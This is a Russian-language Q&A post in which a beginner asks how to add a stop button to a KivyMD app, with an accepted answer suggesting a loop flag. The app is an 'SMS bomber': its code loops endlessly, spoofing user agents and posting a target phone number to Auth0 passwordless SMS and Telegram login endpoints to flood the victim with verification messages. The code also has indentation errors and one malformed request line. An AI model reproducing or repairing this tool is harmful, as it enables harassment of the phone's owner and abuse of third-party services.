# Как сделать кнопку стоп kivymd

Tags: python, kivy, kivymd

Я новичок в киви и не знаю как создать кнопку стоп.
Код из приложения сделан с while и едет бесконечно пока не будет выключена.
Но я хочу сделать кнопку стоп которая остановит все и не придётся выключать приложения

```
from kivy.lang import Builder
from kivymd.app import MDApp
from kivymd.uix.screen import Screen
from kivymd.uix.textfield import MDTextField
from kivymd.uix.button import MDFillRoundFlatButton
import requests, fake_useragent

from kivy.core.window import Window
from kivymd.uix.screen import MDScreen
Window.clearcolor = (23/255, 23/255, 23/255, 1)
Window.title = "Sms Bomber"


user = fake_useragent.UserAgent().random
headers = {'user_agent' : user}

KV = '''
<bomb>:
MDTextField:
    id: num
    size_hint_x: None
    width: "300dp"
    hint_text: "Enter number : "
    max_text_length: 12
    line_color_normal: 0, 0, 0, 0.5
    line_color_focus: 0, 0, 0, 1
    pos_hint: {"center_x": .5, "center_y": .6}
    helper_text: "+373, no space"
    helper_text_mode: "on_focus"
'''

class SmsBomb(MDApp):
    def build(self):
        screen = Screen()
        self.theme_cls.primary_palette = "Purple"
        button = MDFillRoundFlatButton(text = '    Attack ass    ', pos_hint = {"center_x": .5, "center_y": .5},
                                   text_color = (0, 0, 0, 0.9),
                                   md_bg_color = self.theme_cls.primary_light,
                                   on_release = self.show_data)
        self.TakenNumber = Builder.load_string(KV)
        screen.add_widget(self.TakenNumber)
        screen.add_widget(button)
        return screen

def show_data(self, obj):

     print(self.TakenNumber.text)
    NUMBER = self.TakenNumber.text

   

    
    while True:
        user = fake_useragent.UserAgent().random
        headers = {'user_agent': user}

        try:
            response = requests.post('https://straus.eu.auth0.com/passwordless/start', headers=headers,
                                     json={'client_id': "ZeXr5rkYoFzkODO6VxU9x1MCRTTDymKb", 'connection': "sms",
                                           'phone_number': NUMBER, 'send': "code"})
            print('Yes')
        except:
            print('No (Straus)')

        try:
            response: requests.post('https://my.telegram.org/auth/send_password', headers=headers,
                                    data={'phone': NUMBER})
            print('Yes')
        except:
            print('No (Telegram)')

SmsBomb().run()
```

Answer (score 0, accepted):

Нужно создать дополнительную переменную, присвоить ей значение `True` и в цыкле `While` использовать эту переменную, затем создать функцыю которая будет изменять значение этой переменной на `False`, потом создать кнопку которая будет запускать эту функцыю

Comment: Салам у тебя есть дискорд?

Comment: К сожалению нет